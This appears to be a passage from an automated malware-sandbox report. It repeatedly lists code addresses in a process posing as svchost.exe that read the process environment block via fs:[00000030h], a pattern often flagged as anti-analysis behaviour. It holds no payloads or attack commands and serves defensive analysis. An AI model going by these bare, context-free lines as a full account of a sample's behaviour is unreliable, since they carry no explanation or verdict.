Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]	2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]	2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]	2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]	2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]	2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]	2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]	2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]	2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]	2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]	2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]	2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]	2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]	2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]	2_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]	2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]	2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]	2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]	2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]	2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]	2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]	2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]	2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]	2_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]	2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]	2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]	2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]	2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]	2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]	2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]	2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]	2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]	2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]	2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]	2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]	2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]	2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]	2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]	2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]	2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]	2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]	2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]	2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]	2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]	2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]	2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]	2_2_038BCA11
